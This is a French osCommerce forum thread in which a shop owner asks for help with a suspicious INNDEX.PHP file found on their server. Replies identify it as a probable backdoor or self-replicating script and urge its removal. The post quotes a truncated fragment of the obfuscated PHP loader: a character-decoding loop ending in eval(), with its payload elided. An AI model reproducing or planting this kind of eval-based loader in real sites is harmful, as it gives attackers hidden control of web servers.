Aide - Recherche - Membres - Calendrier
Version complète : page php INNDEX.PHP avec code bizard HELP
Forum osCommerce-fr > Adapter OsCommerce MS2 > Sécurité - Mises à jour
cebb
Bonjour à tous,
je viens de découvrir sur mon serveur une page INNDEX.PHP tres tres tres bizard ,

voici le code de la page :

Code
<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|

BLA BLA BLA

se{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

merci d'avance pour votre soutiens et votre aide.
Bonbec
Bonjour,

1) ce n'est pas la peine de copier tout ce code, çà va inspirer des personnes qui s'ennuient wacko.gif
2) cette section du forum a plusieurs fils du même type, tu y trouvera des solutions
3) j'espère que tu avais appliqué les différents conseils de base pour protéger ton site ? Sinon çà va recommencer plus vite que tu ne pourras retirer le ou les codes malicieux ...
cebb
yes en effet j'ai pas pensé à ca .
oui le site est bien protégé normalement .
mais la je beug..

ca a quel incidence a votre avis ??
Gnidhal
Bonjour, Bonbec t'a déjà répondu, dans ce forum les causes, risques et solutions ont déjà été évoqués.
Code à virer d'urgence, cela contient généralement une backdoor (que le pirate récupère sur son site) et/ou un script de duplication pour pourrir le reste de ton site.
ngmsky
Bonjour,
Ma question consistait à savoir comment detectez-vous les nouvelles pages/codes ajoutées dans votre son site, mais veuillez ne pas considérer ce post car j'ai preferé créer un autre sujet à part.
Désolé.

lien du sujet, au cas où ça intéresserait quelqu'un : http://www.oscommerce-fr.info/forum/index....showtopic=70061
Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'informations, la mise en page et les images, veuillez cliquer ici.
Invision Power Board © 2001-2013 Invision Power Services, Inc.